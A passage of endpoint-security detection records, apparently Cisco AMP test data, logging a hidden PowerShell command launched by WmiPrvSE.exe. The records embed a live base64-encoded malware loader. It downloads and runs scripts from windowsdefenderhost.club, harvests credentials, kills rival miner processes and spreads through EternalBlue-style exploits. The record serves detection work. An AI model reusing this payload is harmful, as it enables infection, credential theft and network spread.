JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcABsAGkAdAAoACcAIAAnACkAfAAgAD8AewAkAF8AfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAIQAoACQAbABpAG4AZQAgAC0AaQBzACAAWwBhAHIAcgBhAHkAXQApACkAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAGwAaQBuAGUAWwAtADMAXQAgAC0AbgBlACAAJABuAHUAbABsACkAIAAtAGEAbgBkACAAJAB0AC4AYwBvAG4AdABhAGkAbgBzACgAIgBFAFMAVABBAEIATABJAFMASABFAEQAIgApACAALQBhAG4AZAAgACgAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQAxADEAMQAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADIAMgAyADIAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgAzADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA0ADQANAAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADUANQA1ADUAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA2ADYANgA2ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANwA3ADcANwAiACkAIAAtAG8AcgAgACQAbABpAG4AZQBbAC0AMwBdAC4AYwBvAG4AdABhAGkAbgBzACgAIgA6ADgAOAA4ADgAIgApACAALQBvAHIAIAAkAGwAaQBuAGUAWwAtADMAXQAuAGMAbwBuAHQAYQBpAG4AcwAoACIAOgA5ADkAOQA5ACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANAA1ADUANgAwACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANgA1ADMAMwAzACIAKQAgAC0AbwByACAAJABsAGkAbgBlAFsALQAzAF0ALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoANQA1ADMAMwA1ACIAKQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAdgBpAGQAPQAkAGwAaQBuAGUAWwAtADEAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBpAGQAIAAkAGUAdgBpAGQAIAB8ACAAcwB0AG8AcAAtAHAAcgBvAGMAZQBzAHMAIAAtAGYAbwByAGMAZQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAaQBmACAAKAAhACQAZQB4AGkAcwB0ACAALQBhAG4AZAAgACgAJABwAHMAaQBkAHMALgBjAG8AdQBuAHQAIAAtAGwAZQAgADgAKQApAA0ACgB7ACAAIAAgAA0ACgAgACAAIAAgACQAYwBtAGQAbQBvAG4APQAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBQACAALQBOAG8AbgBJACAALQBXACAASABpAGQAZABlAG4AIABgACIAYAAkAG0AbwBuACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAbQBvAG4AJwBdAC4AVgBhAGwAdQBlADsAYAAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgADsAaQBlAHgAIAAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAGAAJABmAHUAbgBzACkAKQApADsASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAGAAJABSAGUAbQBvAHQAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAQAAoAGAAJABtAG8AbgAsACAAYAAkAG0AbwBuACwAIAAnAFYAbwBpAGQAJwAsACAAMAAsACAAJwAnACwAIAAnACcAKQBgACIAIgANAAoAIAAgACAAIAAkAHYAYgBzACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAEMAbwBtAE8AYgBqAGUAYwB0ACAAVwBTAGMAcgBpAHAAdAAuAFMAaABlAGwAbAANAAoACQAkAHYAYgBzAC4AcgB1AG4AKAAkAGMAbQBkAG0AbwBuACwAMAApACAAIAANAAoAfQANAAoADQAKACQATgBUAEwATQA9ACQARgBhAGwAcwBlAA0ACgAkAG0AaQBtAGkAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBtAGkAbQBpACcAXQAuAFYAYQBsAHUAZQAgAA0ACgAkAGEALAAgACQATgBUAEwATQA9ACAARwBlAHQALQBjAHIAZQBkAHMAIAAkAG0AaQBtAGkAIAAkAG0AaQBtAGkADQAKACAAIAAgACAAIAAgACAADQAKACQATgBlAHQAdwBvAHIAawBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABXAGkAbgAzADIAXwBOAGUAdAB3AG8AcgBrAEEAZABhAHAAdABlAHIAQwBvAG4AZgBpAGcAdQByAGEAdABpAG8AbgAgAC0ARQBBACAAUwB0AG8AcAAgAHwAIAA/ACAAewAkAF8ALgBJAFAARQBuAGEAYgBsAGUAZAB9ACAAIAAgACAADQAKACQAaQBwAHMAdQAgAD0AIAAoAFsAVwBtAGkAQwBsAGEAcwBzAF0AIAAnAHIAbwBvAHQAXABkAGUAZgBhAHUAbAB0ADoAYwBvAHIAZQBkAHAAdQBzAHMAdgByACcAKQAuAFAAcgBvAHAAZQByAHQAaQBlAHMAWwAnAGkAcABzAHUAJwBdAC4AVgBhAGwAdQBlACAADQAKACQAaQAxADcAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBpADEANwAnAF0ALgBWAGEAbAB1AGUADQAKACQAcwBjAGIAYQA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBzAGMAJwBdAC4AVgBhAGwAdQBlAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABzAGMAPQBbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABzAGMAYgBhACkAIAAgACAAIAAgAA0ACgBmAG8AcgBlAGEAYwBoACAAKAAkAE4AZQB0AHcAbwByAGsAIABpAG4AIAAkAE4AZQB0AHcAbwByAGsAcwApACAADQAKAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAADQAKACAAIAAgACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACAAPQAgACQATgBlAHQAdwBvAHIAawAuAEkAcABBAGQAZAByAGUAcwBzAFsAMABdACAAIAANAAoACQBpAGYAIAAoACQASQBQAEEAZABkAHIAZQBzAHMAIAAtAG0AYQB0AGMAaAAgACcAXgAxADYAOQAuADIANQA0ACcAKQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==","parent_app":"WmiPrvSE.exe","parent_app_path":"C:\\Windows\\System32\\wbem","parent_pid":2236,"parent_puid":132461352663910600,"parent_user":"SYSTEM","parent_user_sid":"010100000000000512000000","pid":10724,"puid":132465072105597400,"ts":1602033881727175700,"user":"user@testdomain.com","user_sid":"010100000000000512000000"}}],"limited":false,"matched":1},"schema":"endpoint","schema_epoch":2,"sig_id":20190517123456,"sig_rev":5},"detection":"apde:20190517123456","end_ts":1610640884,"engine":"apde","id":"d2616Ab846","name":"WMIPRVSE Launched Encoded Powershell Command","observables":{"file":[{"md5":"a575a7610e5f003cc36df39e07c4ba7d","name":"powershell.exe","path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"88e7cdc0b75364418e11b2c53f772085f1b61d1e","sha256":"006cef6ef6488721895d93e4cef7fa0709c2692d74bde1e22e2a8719b2a86218","size":443392,"type_id":1},{"md5":"d683c112190f4b4c6d477d693ee88e35","name":"WmiPrvSE.exe","path":"C:\\Windows\\System32\\wbem","properties":{"copyright":"© Microsoft Corporation. All rights reserved.","file_version":"10.0.14409.1005","product":"Microsoft® Windows® Operating System","product_version":"10.0.14409.1005"},"sha1":"67858ead93feed62c0b1865369840e6e8086f53b","sha256":"385892542cc5a996488262b193061feac4615d66657157c3d4a76251911da334","size":425984,"type_id":1}]},"remediated":false,"severity":"medium","silent":false,"start_ts":1610640884,"tactics":["TA0002","TA0005","TA0008"],"type":"activity","normalized":{"observables":{"file":{"name":["powershell.exe","wmiprvse.exe"],"path":["c:\\windows\\system32\\windowspowershell\\v1.0","c:\\windows\\system32\\wbem"]}},"name":"wmiprvse launched encoded powershell command"},"ts":1610640884},"tactics":["TA0002","TA0005","TA0008"]}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880683125978957000,"timestamp":1610640884,"timestamp_nanoseconds":810000000,"date":"2021-01-14T16:14:44+00:00","event_type":"Threat Detection","event_type_id":553648222,"detection":"WMIPRVSE Launched Encoded Powershell Command","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"bp_data":{"audit":false,"details":{"actions":[{"action":"end_process","end_ts":1602033881808,"params":["10724"],"start_ts":1602033881805,"status":"success"}],"eng_epoch":1,"eng_ver":"0.9.0.104","matched_activity":{"events":[{"process:start":{"app":"powershell.exe","app_path":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","args":["powershell.exe","-NoP","-NonI","-W","Hidden","-E","JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJ